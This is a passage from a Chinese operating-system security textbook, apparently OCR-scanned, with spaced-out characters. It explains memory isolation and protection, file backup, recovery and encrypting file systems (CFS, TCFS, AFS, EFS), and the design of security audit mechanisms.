要 保证 系统 中 各 个 进程 互 不 干扰 ， 就 需要 实现 必要 的 访问 控制 和 存储 器 的 隔离 。 存 
储 器 保护 的 实现 需要 硬件 和 软件 协作 完成 ， 软 件 指 操作 系统 的 内 存 管理 子 系统 ， 硬 件 指 
处 理 器 的 虚拟 内 存 管理 子 系统 。 内 存 管 理子 系统 保证 系统 中 所 有 进程 都 有 相互 完全 分 离 
的 虚拟 地 址 空间 ， 从 而 运行 一 个 应 用 程序 的 进程 不 会 影响 其 他 的 进程 。 处 理 器 中 的 虚拟 
内 存 管 理子 系统 支持 操作 系统 的 内 存 管 理子 系统 完成 地 址 变换 和 内 存 的 访问 控制 ， 其 硬 
件 强制 执行 性 保证 了 这 种 保护 机 制 不 会 被 任何 恶意 程序 绕 过 。 存 储 器 的 硬件 保护 主要 由 
地 址 映射 引入 ， 其 中 涉及 各 种 权限 检查 和 访问 控制 ， 目 的 在 于 实现 进程 的 逻辑 隔离 和 内 
存 页 面 的 访问 控制 ， 例 如 段 选择 符 、 段 描述 符 、 页 描述 符 、 存 储 键 等 ， 利 用 它们 可 对 所 
选择 的 存储 单元 的 起 始 地 址 、 长 度 、 访 问 方式 进行 限制 ， 起 到 了 隔离 保护 的 作用 。 

保护 的 单元 为 存储 器 中 的 最 小 数据 范围 ， 可 以 是 字 、 字 块 、 页 面 或 段 。 保 护 单位 越 
小 ， 存 储 器 保护 的 精度 越 高 。 对 于 代表 单个 用 户 ， 在 内 存 中 一 次 运行 一 个 进程 的 系统 ， 
存储 保护 机 制 应 该 防止 用 户 进程 对 操作 系统 的 影响 。 在 允许 多 道 程序 并 发 运行 的 多 任务 
操作 系统 中 ， 还 进一步 要 求 存储 保护 机 制 对 进程 的 存储 区 域 实行 互相 隔离 。 

存储 器 保护 与 存储 器 管理 是 紧密 相关 的 ， 存 储 器 保护 负责 保证 系统 各 个 任务 之 间 互 
不 干扰 ; 存储 器 管理 则 是 为 了 更 有 效 地 利用 存储 空间 。 
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一 个 进程 的 运行 需要 一 个 “私有 的 ”存储 空间 ， 进 程 的 程序 与 数据 都 存 于 该 空间 中 
这 个 空间 不 包括 该 进程 通过 VO 指令 访问 的 辅 存 空间 〈 磁 带 、 磁 盘 等 ) 。 在 这 个 进程 地 
址 空间 中 ， 每 一 个 字 都 有 一 个 固定 的 虚 地 址 〈 并 不 是 目标 的 物理 地 址 ， 但 每 一 个 虚 地 址 
均 可 映射 成 一 个 物理 地 址 ) ， 进 程 通过 这 个 虚 地 址 访问 这 个 字 。 大 多 数 系统 都 支持 某 种 
类 型 的 虚 存 方式 , 这 种 虚 存 方式 使 得 一 个 字 的 物理 定位 是 可 变 的 , 在 每 次 调度 该 进程 时 ， 
它 的 物理 地 址 可 能 不 同 。 

存储 器 隔离 主要 有 进程 与 进程 的 隔离 ， 用 户 空间 与 内 核 空间 的 隔离 。 在 绝 大 部 分 系 
统 中 ， 一 个 进程 的 虚 地 址 空间 至 少 要 被 分 成 两 部 分 或 称 两 个 段 : 一 个 用 于 用 户 程序 与 数 
据 ， 称 为 用 户 空 间 ， 另 一 个 用 于 操作 系统 ， 称 为 内 核 空 间 。 两 者 的 隔离 是 静态 的 ， 也 是 
比较 简单 的 。 驻 留 在 内 存 中 的 操作 系统 可 以 由 所 有 进程 共享 。 虽 然 有 些 系统 允许 进程 共 
享 一 些 物理 页 ， 但 用 户 间 是 彼此 隔离 的 。 最 灵活 的 分 段 虚 存 方式 是 : 允许 一 个 进程 拥有 
许多 段 ， 这 些 段 中 的 任何 一 个 都 可 以 由 其 他 进程 共享 。 

可 以 采用 硬件 虚拟 化 技术 来 实现 用 户 程 序 之 间 ， 包 括 用 户 程序 对 操作 系统 的 安全 隔 
离 。 其 原理 是 使 用 虚拟 机 监控 器 (Virtual Machine Monitor, VMM) 来 截获 用 户 程序 为 
请 求 使 用 物理 内 存 时 所 发 出 的 中 断 ， 从 而 能 够 为 用 户 程序 提供 妥善 的 存储 器 管理 服务 。 
由 于 VMM 对 中 断 的 截获 具有 不 可 被 旁 路 的 性 质 ， 所 以 这 样 的 存储 器 管理 具有 强制 性 。 

VMM 是 系统 程序 集中 特权 级 别 最 高 的 一 个 软件 ， 一 旦 被 加 载 入 内 存 中 运转 起 来 之 
后 便 开 始 执行 强制 性 内 存 管理 ， 所 以 一 个 攻击 软件 在 VMM 的 监控 之 下 很 难 对 VMM 所 
使 用 的 内 存 区 域 进行 任何 形式 的 访问 。 另 外 值得 一 提 的 是 VMM 的 执行 代码 部 分 可 以 做 
成 一 个 静态 程序 。 

对 于 一 般 的 用 户 级 软件 ， 完 整 性 保护 至 少 有 两 个 方面 需要 防范 : 软件 在 内 存 中 及 在 
外 存 中 都 需要 保护 。 前 一 种 情况 是 指 一 个 软件 的 代码 〈 包 括 有 些 数据 ) 已 经 被 加 载 入 计 
算 平 台 的 内 存 中 后 ， 在 执行 的 时 候 平台 对 内 存 内 容 实行 完整 性 保护 。 在 这 一 情况 下 。 软 
件 完整 性 的 定义 是 一 个 比较 复杂 的 问题 〈 例 如 需要 区 分 软件 代码 的 合法 自身 修改 与 被 非 
法 算 改 , 另外 在 内 存 中 一 个 软件 可 以 有 动态 链接 部 分 )。 所 以 目前 在 内 存 中 对 软件 的 完整 
性 保护 手段 很 有 限 。 对 于 后 一 种 情况 ， 由 于 软件 在 外 存 〈 如 磁盘 ) 中 的 完整 性 定义 要 比 
在 内 存 中 的 情况 简单 得 多 。 就 是 指 一 般 意义 上 的 数据 完整 性 ， 手 段 不 外 乎 使 用 更 改 检测 
码 (Modification Detection Code，MDC， 可 以 用 哈 希 函数 来 实现 )， 所 以 保护 手段 就 相对 
比较 成 熟 。 

目前 一 些 常 用 的 存储 器 保护 机 制 主 要 有 以 下 几 种 : 

(1) 所 有 系统 范围 内 内 核 态 组 件 使 用 的 数据 结构 和 内 存 缓冲 池 只 能 在 内 核 态 下 访 
问 ， 用 户 态 线程 不 能 访问 这 些 页 面 。 如 果 它 们 试图 这 样 做， 硬件 会 产生 一 个 错误 信息 ， 
随后 内 存 管理 器 线程 报告 一 个 访问 冲突 。 

(2) 每 个 进程 有 一 个 独立 、 私 有 的 地 址 空间 ， 禁 止 其 他 进程 的 线程 访问 。 唯 一 例外 
是 ， 该 进程 和 其 他 进程 共享 页 面 ， 或 另 一 进程 具有 对 进程 对 象 的 虚拟 内 存 读 写 权限 。 
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G) 除了 提供 虚拟 到 物理 地 址 转换 的 隐 含 保护 外 ， 处 理 器 还 提供 了 一 些 硬件 内 存 保 
护 措施 〈 如 读 / 写 ， 只 读 等 )。 这 种 保护 的 细节 根据 处 理 器 不 同 而 不 同 。 例 如 ， 在 进程 的 
地 址 空间 中 代码 页 被 标志 为 只 读 ， 可 以 防止 被 用 户 线程 修改 。 

(4) 共享 内 存 区 域 对 象 具有 标准 的 存 取 控 制 表 (ACL)， 当 进程 试图 打开 它们 时 会 
检查 ACL 表 ， 这 样 对 共享 内 存 的 访问 也 限制 在 具有 适当 权限 的 进程 之 中 。 
4.2.4.7 文件 保护 机 制 

在 操作 系统 中 ， 所 有 的 数据 都 是 以 文件 形式 存在 的 。 文 件 保护 就 是 防止 文件 被 非法 
窃取 、 自 改 或 丢失 ， 同 时 又 保证 合法 用 户 能 正确 使 用 文件 。 进 行文 件 保护 的 方法 主要 有 
文件 的 备份 ， 文 件 的 恢复 ， 文 件 的 加 密 。 

1. 文件 备份 

文件 备份 的 目的 主要 就 是 为 了 保险 ， 防 止 文件 丢失 。 

在 进行 备份 之 前 ， 应 先 做 好 备份 规划 ， 选 择 合适 的 备份 策略 。 在 制订 备份 规划 时 
要 考虑 备份 的 时 间 ， 保 存 备份 的 设备 ， 备 份 媒体 存放 的 地 点 ， 谁 来 做 备份 ， 备 份 哪些 广 
件 等 。 常 见 的 备份 策略 有 完全 备份 〈Full Backup) 和 增 量 备份 (Incremental Backup) 。 

完全 备份 是 最 简单 最 彻底 的 备份 方案 ， 将 系统 中 的 所 有 文件 复制 到 磁带 或 其 他 备份 
媒介 上 。 这 样 备份 的 一 组 文件 往往 是 整个 计算 机 系统 或 是 一 个 磁盘 分 区 。 完 全 备份 需要 
花 很 多 时 间 而 且 不 灵活 。 从 一 个 包含 多 磁带 的 大 型 备份 中 恢复 单个 文件 很 不 方便 。 特 别 
是 文件 变化 不 频繁 时 ， 为 了 少数 几 个 变化 的 新 文件 而 花费 大 量 时 间 进 行 完 全 备份 是 不 值 
得 的 。 

增 量 备份 更 常见 一 些 。 对 于 增 量 备份 ， 系 统 仅 仅 复制 自 上 次 备份 之 后 改变 的 文件 。 
增 量 备份 的 完全 备份 工作 量 很 大 而 且 在 一 定 的 时 间 段 〈 比 如 说 一 天 ) 中 只 有 少量 的 数据 
改变 的 情况 下 使 用 。 在 这 种 情况 下 ， 增 量 备份 所 需 的 时 间 会 比 完全 备份 所 需 的 时 间 显 著 
减少 。 

有 些 Unix 备份 程序 使 用 备份 级 别 (Backup Level) 的 概念 来 区 分 不 同类 型 的 备份 。 
每 种 类 型 的 备份 都 有 一 个 级 别 号 。 根 据 定义 ， 完 全 备份 的 级 别 为 0。 在 任何 一 级 进行 备 
份 意味 着 保存 自 上 一 级 别 的 最 后 一 次 备份 以 后 改变 了 的 文件 。 这 就 是 说 ， 一 个 1 级 备份 
将 保存 从 上 一 次 完全 备份 (0 级 ) 之 后 改变 的 所 有 文件 ， 一 个 2 级 备份 需要 保存 从 上 一 
次 备份 之 后 改变 的 所 有 文件 ， 依 此 类 推 。 

一 个 典型 的 备份 策略 使 用 多 种 级 别 的 备份 : 在 一 个 星期 的 开始 进行 完全 备份 ， 以 后 
每 天 进行 1 级 备份 ， 将 完全 备份 后 已 改变 的 文件 备份 出 来 。 下 面 的 备份 时 间 表 总 结 了 这 
种 备份 规划 的 实施 过 程 : 

星期 日 : 0 级 备份 (完全 备份 ); 

星期 一 至 星期 六 : 1 级 备份 ( 增 量 备份 )。 

这 种 策略 的 优点 在 于 ， 它 只 需要 两 套 备份 媒介 来 恢复 整个 文件 系统 完全 备份 磁带 
和 增 量 备份 磁带 ) 。 它 的 主要 缺点 是 ， 每 天 的 备份 量 会 逐渐 增多 ， 当 系统 非常 活跃 时 ， 
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到 一 个 星期 结束 时 ， 增 量 备份 的 数据 量 会 和 完全 备份 的 数据 量 相当 。 

许多 情况 下 ， 设 备 可 以 简单 地 把 备份 写 入 媒介 ， 并 把 此 媒介 置 于 指定 的 存放 位 置 。 
只 要 能 够 确定 备份 设备 和 媒介 的 可 靠 性 ， 这 种 方法 是 可 行 的 。 否 则 , 不 妨 进 行 数据 验证 。 
数据 验证 把 备份 的 数据 和 磁盘 上 的 版 本 进行 比较 ， 确 保 文件 被 正确 备份 。 它 还 验证 媒介 
本 身 是 否 可 读 。 应 该 定期 验证 所 有 备份 设备 。 

一 旦 将 数据 写 入 备份 磁盘 、 软 盘 或 其 他 媒介 后 ， 就 应 该 妥善 地 保管 这 些 存 储 媒 介 ， 


使 日 常 恢复 变 得 简单 ， 使 备份 媒介 写 保护 ， 考 虑 环境 因素 ; 正确 使 用 媒介 ;注意 安全 。 

离 站 备份 是 防止 系统 毁坏 的 最 后 一 道 屏障 。 离 站 备份 保存 在 上 锁 的 、 防 火 的 、 有 环 
境 保护 措施 的 完全 在 站 点 以 外 的 地 点 。 只 要 可 能 ， 就 应 该 对 卸载 的 文件 系统 进行 这 种 
备份 。 

2. 文件 恢复 

备份 可 以 对 数据 进行 保护 ， 但 只 有 真正 成 功 的 备份 才能 起 到 保护 作用 ， 因 此 在 执行 
备份 时 应 该 对 备份 成 功 与 否 进行 检验 ， 检 验 的 最 简单 的 方法 就 是 用 它们 执行 恢复 操作 。 

当 需 要 使 用 的 文件 丢失 或 遭 到 破坏 时 ， 就 需要 从 备份 文件 中 进行 恢复 。 大 多 数 系统 
都 提供 了 各 种 工具 来 执行 备份 ， 包 括 通用 的 存档 程序 如 tar 和 cpio， 利 用 这 些 工 具 可 从 
备份 的 文件 中 进行 文件 恢复 。 还 有 一 些 其 他 的 备份 和 恢复 工具 ， 以 及 对 每 个 文件 系统 实 
现 多 级 增 量 备份 方案 的 程序 。 

3， 文 件 加 密 

一 些 重要 或 私密 信息 如 果 外 泄 ， 会 带 来 严重 后 果 ， 如 机 密 信 息 被 竞争 对 手 获 取 ， 移 
动 设备 〈U 盘 、 光 盘 、 笔 记 本 、 硬 盘 ) 丢失 或 被 盗 甚至 送 修 ， 机 密 信息 被 公开 、 盗 卖 。 
只 有 提早 做 好 预防 泄密 的 准备 ， 才 能 防止 此 类 安全 隐患 。 

对 文件 进行 加 密 是 一 种 有 效 的 数据 加 密 存 储 技术 ， 它 可 以 有 效 防止 非法 入 侵 者 窃取 
用 户 的 机 密 数据 ， 另 外 ， 在 多 个 用 户 共享 一 个 系统 的 情况 下 ， 可 以 很 好 地 保护 用 户 的 私 
有 数据 。 

文件 加 密 就 是 将 重要 的 文件 以 密 文 的 形式 存储 在 媒介 上 。 要 想 实现 文件 加 密 ， 需 要 
有 加 密 文件 系统 的 支持 ， 加 密 文 件 系 统 允 许 用 户 以 加 密 格式 存储 磁盘 上 的 数据 。 

加 密 是 将 数据 转换 成 不 能 被 其 他 用 户 读 取 的 格式 的 过 程 。 一 旦 用 户 加 密 了 文件 ， 只 
要 文件 存储 在 磁盘 上 ， 它 就 会 自动 保持 加 密 状 态 。 解 密 是 将 数据 从 加 密 格式 转换 为 原始 
格式 的 过 程 。 一 旦 用 户 解密 了 文件 ， 只 要 文件 存储 在 磁盘 上 ， 它 就 会 保持 解密 状态 。 

对 加 密 某 文 件 的 用 户 , 加 密 是 透明 的 。 这 表明 不 必 在 使 用 前 手动 解密 已 加 密 的 文件 。 
就 可 以 正常 打开 和 更 改 文件 。 

目前 ， 已 经 有 很 多 成 熟 的 加 密 文 件 系统 被 广泛 地 应 用 ， 如 基于 Linux 系统 的 CFS 
(Cryptographic File System) , TCFS ( Transparent Cryptographic File System) , AFS (Andrew 
File System) ， 基 于 Windows 系统 的 EFS (Encrypting File System) 等 。 
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CFS 是 一 个 经 典 的 加 密 文件 系统 , 使 用 DES 来 加 密 文 件 。 CFS 客户 基于 网 络 文件 系 
统 (NFS) 协议 运行 一 个 服务 器 保护 程序 ， 可 以 使 用 本 地 或 网 络 文件 系统 来 进行 存储 。 
CFS 为 目录 和 文件 提供 一 个 透明 的 接口 ， 并 自动 使 用 用 户 提供 的 密 钥 加 密 。 一 条 单独 的 
命令 把 一 个 密 钥 和 一 个 目录 关联 起 来 ， 从 这 时 起 ， 目 录 的 内 容 在 写 时 自动 加 密 ， 在 打开 
时 自动 解密 。 

CFS 最 大 的 缺点 在 于 其 效率 低下 ， 这 是 因为 它 的 加 密 操作 在 用 户 层 完 成 ， 而 且 要 频 

繁 地 进行 用 户 层 到 核心 层 的 数据 交换 所 致 。 另 外 ，CFS 的 加 密 是 基于 目录 的 ， 虽 然 它 会 
把 加 密 目 录 下 的 所 有 文件 内 容 加 密 ， 但 文件 名 、 文 件 大 小 、 访 问 时 间 、 目 录 结 构 等 信息 
都 是 以 明文 形式 存储 ， 这 些 极 大 地 影响 了 系统 整体 的 安全 性 。 
TCFS 是 一 个 受 CFS 启发 的 Linux 软件 包 。TCFS 具有 更 大 的 透明 度 , 用 户 甚至 不 需 
知道 他 们 的 文件 被 加 密 了 。TCFS 操作 起 来 类 似 于 NFS: 一 个 TCFS 文件 系统 可 以 让 应 
用 程序 使 用 相同 的 系统 调用 NFS Copen, read, write) 来 访问 。 数 据 块 仅 在 正确 的 密 钥 
对 内 核 可 用 时 进行 解密 。TCFS 对 数据 进行 加 密 时 ， 对 每 个 文件 使 用 不 同 的 “文件 密 钥 ” 
进行 加 密 ， 对 一 个 文件 的 不 同 部 分 使 用 的 不 同 的 “ 块 密 钥 ” 进 行 加 密 ， 这 就 保证 了 用 户 
无 法 通过 比较 两 个 文件 来 判断 它们 的 明文 是 否 相 同 ， 也 无 法 判断 同一 文件 的 不 同 部 分 的 
明文 是 否 相 同 。 用 户 的 “ 主 密 钥 ” 由 用 户 的 登录 密码 加 密 后 存放 在 文件 中 。 与 CFS 不 同 ， 
TCFS 的 数据 加 密 、 解 密 操作 在 核心 层 完成 ， 所 以 性 能 有 所 改善 。 

TCFS 的 问题 在 于 系统 的 安全 性 过 多 地 依赖 于 用 户 的 登录 密码 ， 而 且 加 密 密 钥 存放 
在 磁盘 上 的 方式 也 在 一 定 程度 上 降低 了 系统 的 安全 性 ， 因 为 其 基于 NFS 的 工作 机 制 , 每 
次 读 写 操作 都 会 涉及 到 多 次 核心 层 与 用 户 层 之 间 的 数据 交换 ， 所 以 其 效率 的 低下 还 是 难 
以 避免 。 另 外 ，TCEFS 对 文件 名 、 文 件 大 小 、 访 问 时 间 、 目 录 结 构 等 一 些 敏 感 信息 也 没 
有 做 很 好 的 保护 。 

AFS 是 一 个 分 布 式 加 密 文件 系统 ， 它 通过 一 个 统一 的 访问 接口 把 多 个 服务 器 连接 起 
来 ， 形 成 一 个 庞大 的 数据 存储 空间 。 客 户 端 在 访问 服务 器 上 的 数据 时 ， 只 要 把 共享 目录 
挂 载 到 本 地 目录 上 就 可 以 了 ， 无 须 去 关心 数据 到 底 存 放 在 哪个 服务 器 上 。AFS 实施 了 严 
格 的 访问 控制 ， 每 个 目录 的 访问 控制 列表 可 以 有 20 个 条 目 ， 这 样 ， 目 录 结 构 、 目 录 下 文 
件 的 文件 名 、 文 件 大 小 等 敏感 信息 得 到 了 很 好 的 保护 ，AFS 提供 了 一 个 安全 的 数据 传输 
路 径 ， 客 户 端 与 服务 器 端 进行 数据 交换 时 用 会 话 密 钥 进行 加 密 。AFS 存在 一 个 严重 的 缺 
陷 : 数据 在 服务 器 端 是 明文 存储 。 这 就 要 求 数据 服务 器 必须 绝对 安全 、 可 信 ， 而 这 一 点 
很 难 做 到 。 另 外 ， 分 布 式 的 数据 存储 方式 使 得 只 要 有 一 台 服 务 器 被 非法 侵入 ， 则 整个 系 
统 的 安全 性 都 将 被 破坏 。 

EFS 是 一 个 由 微软 从 Windows2000 系列 开始 引入 的 加 密 文 件 系统 , 它 提供 的 透明 的 
文件 加 密 服 务 ， 以 公共 密 钥 加 密 为 基础 。EFS 在 后 台 运 行 并 且 对 用 户 和 应 用 程序 是 透明 
的 ， 仅 允许 鉴别 的 用 户 访问 加 密 的 文件 。EFS 自动 为 用 户 解密 文件 并 且 在 文件 存储 的 时 
候 为 文件 自动 加 密 。EFS 提供 可 选 的 数据 恢复 能 力 ， 系 统管 理 员 可 以 恢复 另 一 用 户 加 密 
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的 数据 。EFS 也 可 以 实现 多 用 户 (当然 是 被 许可 的 用 户 ) 共享 存 取 一 个 已 经 加 密 的 数据 。 
EFS 文件 在 本 地 或 网 络 上 都 是 保持 加 密 状 态 的 。 文 件 可 以 在 离线 文件 夹 中 被 加 密 。 加 密 
的 文件 和 文件 夹 是 能 够 被 颜色 标示 出 来 的 。 

EFS 采用 基于 公 钥 的 方案 实现 数据 加 密 或 解密 ， 它 使 用 标准 x509 证 书 ， 每 一 个 受 
保护 的 文件 都 是 被 一 个 使 用 带 有 一 定 长 度 的 文件 加 密 密 钥 FEK) 的 快速 对 称 加 密 算法 
加 密 的 FEK 的 长 度 由 算法 或 法 则 决定 ) 。 一 个 用 户 要 访问 一 个 已 加 密 的 文件 ， 他 必须 
拥有 与 公 钥 相 适应 的 私 钥 。 它 易于 管理 , 不 易 受 到 攻击 , 并 且 对 用 户 是 透明 的 。 由 于 EFS 
被 设计 成 为 透明 的 , 对 于 打开 、 读 取 、 写 入 已 加 密 文件 便 与 操作 普通 文件 没有 任何 区 别 。 

EFS 与 NTFS 紧密 地 集成 在 一 起 。 当 创建 临时 文件 时 ， 只 要 所 有 文件 在 NTFS 卷 上 ， 
原始 文件 的 属性 就 会 被 复制 到 临时 文件 中 。 如 果 加 密 了 一 个 文件 ，EFS 也 会 将 其 临时 文 
件 进 行 加 密 。EFS 驻 留 在 操作 系统 内 核 中 ， 并 且 使 用 不 分 页 的 池 存 储 文件 加 密 密 钥 ， 保 
证 了 密 钥 不 会 出 现在 分 页 文件 中 。 这 防止 了 一 些 应 用 程序 在 创建 临时 文件 时 泄密 。 

通过 EFS 加 密 敏感 性 文件 ， 会 增加 更 多 层级 的 安全 性 防护 。 在 加 密 文件 时 ， 即 使 黑 
客 已 完全 存 取 电脑 的 文件 储存 体 ， 其 文件 仍然 受到 保护 。 

EFS 可 以 说 是 微软 为 用 户 提 供 的 一 个 内 建 在 Windows 产 品 中 的 方便 快捷 并 且 强 大 的 
加 密 系统 ， 然 而 ， 微 软 设计 了 让 其 他 操作 系统 也 能 读 取 NTFS 的 文件 格式 来 使 用 户 能 够 
避 开 硬盘 故障 以 及 启动 分 区 故障 。 因 此 ， 使 用 某 些 操作 系统 可 以 很 容易 地 绕 过 NTFS 安 
全 机 制 ， 存 取 NTFS 文件 。 
4.2.4.8 ”安全 审计 机 制 

操作 系统 的 安全 审计 是 指 对 系统 中 有 关 安 全 的 活动 进行 记录 、 检 查 和 审核 。 审 计 是 
一 种 事后 分 析 法 ， 一 般 通过 对 日 志 的 分 析 来 完成 。 审 计 是 对 访问 控制 的 必要 补充 ， 是 访 
问 控制 的 一 个 重要 内 容 ， 它 的 主要 目的 就 是 检测 和 阻止 非法 用 户 对 计算 机 系统 的 入 侵 ， 
并 显示 合法 用 户 的 误 操 作 。 审 计 会 对 用 户 使 用 何 种 信息 资源 、 使 用 的 时 间 ， 以 及 如 何 使 
用 “〔 执 行 何 种 操作 ) 进行 记录 与 监控 。 审 计 和 监控 是 实现 系统 安全 的 最 后 一 道 防线 ， 处 
于 系统 的 最 高 层 。 审 计 与 监控 能 够 再 现 原 有 的 进程 和 问题 ， 这 对 于 责任 追查 和 数据 恢复 
非常 有 必要 。 审 计 作为 一 种 事后 追查 的 手段 来 保证 系统 的 安全 ， 它 对 涉及 系统 安全 的 操 
作 做 一 个 完整 的 记录 。 审 计 为 系统 进行 事故 原因 的 查询 、 定 位 ， 事 故 发 生前 的 预测 、 报 
警 以 及 事故 发 生 之 后 的 实时 处 理 提供 详细 、 可 靠 的 依据 和 支持 ， 以 备 有 违反 系统 安全 规 
则 的 事件 发 生 后 能 够 有 效 地 追查 事件 发 生 的 地 点 和 过 程 以 及 责任 人 。 

审计 跟踪 是 系统 活动 的 流水 记录 。 该 记录 按 事件 从 始 至 终 的 途径 ， 顺 序 检查 、 审 查 
和 检验 每 个 事件 的 环境 及 活动 。 审 计 跟 踪 记 录 系 统 活 动 和 用 户 活动 。 审 计 跟 踪 可 以 发 现 
违反 安全 策略 的 活动 、 影 响 运行 效率 的 问题 以 及 程序 中 的 错误 。 审 计 跟 踪 不 但 有 助 于 帮 
助 系统 管理 员 确保 系统 及 其 资源 免 遭 非法 授权 用 户 的 侵害 ， 同 时 还 能 帮助 恢复 数据 。 

在 安全 操作 系统 中 ， 安 全 审计 的 作用 主要 体现 在 根据 审计 信息 追查 执行 事件 的 当 事 
人 ， 明 确 事故 责任 ; 通过 对 审计 信息 的 分 析 ， 可 以 发 现 系 统 设 计 或 配置 管理 存在 的 不 足 ， 
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有 利于 改进 系统 安全 性 ;把 审计 功能 与 报警 功能 结合 起 来 ， 可 以 实现 安全 管理 员 对 系统 
状态 的 实时 监控 。 

审计 是 指 产 生 、 记 录 并 检查 按时 间 顺 序 排列 的 系统 事件 记录 的 过 程 。 它 是 一 个 被 信 
任 的 机 制 ，TCB 的 一 部 分 。 同 时 它 也 是 计算 机 系统 安全 机 制 的 一 个 不 可 或 缺 的 部 分 ， 对 
于 C2 及 以 上 安全 级 别 的 计算 机 系统 来 讲 ， 审 计 功 能 是 其 必 备 的 安全 机 制 。 而 且 审 计 是 
其 他 安全 机 制 的 有 力 补 充 ， 它 贯穿 计算 机 安全 机 制 实现 的 整个 过 程 ， 从 身份 鉴别 到 访问 
控制 这 些 都 离 不 开 审 计 ， 同 时 审计 还 是 后 来 人 们 研究 的 入 侵 检测 系统 的 前 提 。 

为 完成 审计 功能 ， 审 计 系 统 需要 三 大 功能 模块 : 审计 事件 的 收集 及 过 滤 功 能 模块 ， 
审计 事件 的 记录 及 查询 功能 模块 ， 审 计 事件 分 析 及 响应 报警 功能 模块 。 

所 谓 审计 事件 ， 就 是 系统 审计 用 户 操作 的 最 基本 单位 。 系 统 将 所 有 要 求 审 计 或 可 以 
审计 的 用 户 动 作 都 归纳 成 一 个 个 可 区 分 、 可 识别 、 可 标志 用 户 行为 和 可 记录 的 审计 单位 。 
审计 机 制 对 系统 、 用 户主 体 、 客 体 〈 包 括 文件 、 消 息 、 信 号 量 、 共 享 区 等 ) 都 可 以 定义 
为 要 求 被 审计 的 事件 集 。 

安全 操作 系统 一 般 将 要 审计 的 事件 分 成 注册 事件 、 使 用 系统 的 事件 及 利用 隐蔽 通道 
的 事件 三 类 。 亦 即 标识 和 鉴别 机 制 的 使 用 、 把 客体 引入 到 用 户 的 地 址 空间 〈 如 创建 文件 、 
启动 程序 ) 、 从 地 址 空间 删除 客体 、 特 权 用 户 所 发 生 的 动作 以 及 利用 隐蔽 存储 通道 的 事 
件 等 。 第 一 类 属于 系统 外 部 事件 ， 即 准备 进入 系统 的 用 户 产 生 的 事件 ， 后 两 类 属于 系统 
内 部 事件 ， 即 已 经 进入 系统 的 用 户 产生 的 事件 。 

审计 事件 的 收集 是 指 一 定安 全 级 别 审计 事件 标准 下 的 审计 事件 的 确立 。 审 计 事件 标 
准 一 般 从 两 方面 来 看 : 一 是 从 主体 角度 来 看 ， 系 统 要 记录 用 户 进行 的 所 有 活动 ， 每 个 用 
户 有 自己 待 审定 的 事件 集 ， 称 为 用 户 事件 标准 。 一 旦 其 行为 落 入 用 户 事件 集 ， 系 统 就 会 
把 事件 信息 记录 下 来 。 二 是 从 客体 的 角度 看 ， 系 统 要 有 能 力 记 录 关 于 某 一 客体 的 所 有 存 
取 活 动 。 确 立 该 客体 对 象 的 哪些 操作 事件 要 求 被 审计 ， 即 对 象 事件 标准 。 

审计 机 制 一 般 对 系统 定义 了 一 个 固定 审计 事件 集 ， 即 必须 审计 事件 的 集合 。 对 用 户 
来 讲 ， 系 统 可 以 设置 要 求 审计 的 事件 ， 即 用 户 事件 标准 。 

显然 审计 过 程 会 增 大 系统 的 开销 ， 过 多 的 系统 内 核 级 操作 会 影响 系统 的 运行 速度 ， 
过 多 的 审计 信息 会 对 系统 产生 很 大 的 负载 ， 也 会 淹没 其 中 最 重要 的 信息 。 所 以 对 审计 数 
据 需要 依据 安全 要 求 进行 过 滤 ， 设 置 有 效 的 审计 事件 过 滤 ， 切 实 获取 与 安全 审计 直接 相 
关 的 数据 ， 在 审计 粒度 和 系统 性 能 之 间 找 到 一 个 平衡 点 。 

审计 系统 作为 安全 操作 系统 的 重要 组 成 部 分 ， 如 果 其 自身 的 安全 被 突破 ， 将 会 对 系 
统 安全 造成 很 大 影响 。 在 保证 审计 系统 自身 安全 方面 ， 采 取 以 下 措施 : 一 是 保证 程序 和 
代码 的 安全 ， 包 括 审 计数 据 的 采集 、 记 录 、 分 析 部 分 集成 到 安全 内 核 ， 审 计 进 程 的 执行 
不 受 外 界 影响 ， 外 部 的 应 用 程序 则 严格 遵循 强制 访问 控制 和 最 小 特权 控制 ， 保 证 只 有 审 
计 员 才能 使 用 这 些 程序 。 二 是 严格 管理 系统 配置 和 审计 数据 的 安全 。 确 保 只 有 审计 员 才 
能 配置 和 修改 系统 配置 。 审 计 文件 则 是 在 运行 的 过 程 中 生成 ， 它 的 安全 级 由 审计 进程 在 
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创建 文件 的 同时 指定 。 根 据 进程 创建 对 象 的 安全 级 等 于 进程 安全 级 的 原则 ， 创 建 的 文件 
也 是 系统 审计 级 。 密 码 系 统 对 于 审计 记录 的 管理 ， 可 以 保证 即使 审计 记录 泄漏 出 去 也 不 
会 被 别人 看 到 。 另外， 系统 对 审计 员 的 监督 机 制 可 以 使 系统 特权 分 离 , 将 风险 降 到 最 低 。 

如 果 将 审计 和 报警 功能 结合 起 来 ， 那 就 可 以 做 到 每 当 有 违反 系统 安全 的 事件 发 生 或 
者 有 涉及 系统 安全 的 重要 操作 进行 时 ， 就 及 时 向 安全 操作 员 终 端 发 送 相应 的 报警 信息 。 
审计 过 程 一 般 是 一 个 独立 的 过 程 ， 它 应 与 系统 其 他 功能 相隔 离 。 同 时 要 求 操作 系统 必须 

E 够 生成 、 维 护 及 保护 审计 过 程 ， 使 其 免 遭 修改 、 非 法 访问 及 毁坏 ， 特 别 要 保护 审计 数 
据 ， 要 严格 限制 未 经 授权 的 用 户 访 问 它 。 

日 志 存放 了 记录 的 事件 或 统计 数据 ， 提 供 关 于 系统 使 用 及 性 能 方面 的 信息 。 日 志 策 
略 是 整个 安全 策略 不 可 缺少 的 一 部 分 ， 目 的 是 维护 足够 的 审计 。 日 志文 件 对 于 维护 系统 
安全 很 重要 。 它 们 为 两 个 重要 功能 提供 数据 : 审计 和 监测 。 它 们 通过 提供 一 个 历史 记 
录 系统 中 关于 活动 的 审计 轨迹 一 一 允许 用 户 或 第 三 方 回头 来 系统 地 评价 安全 程序 
的 效率 以 及 确定 引起 安全 破坏 或 系统 功能 失效 的 原因 。 如 果 需 要 ， 它 们 还 能 作为 呈现 给 
权威 机 构 的 证 据 。 它 们 还 能 用 来 “实时 ”地 监测 系统 状态 ， 检 测 和 追踪 侵入 者 ， 发 现 问 
题 以 及 阻止 问题 发 生 。 

用 户 可 以 通过 浏览 日 志 条 目 来 查看 自己 的 系统 或 使 用 工具 来 代为 查看 。 警 告 日 志 使 
用 户 对 自己 的 行为 负责 ， 特 别 是 在 有 较 强 用 户 授权 策略 的 系统 中 。 

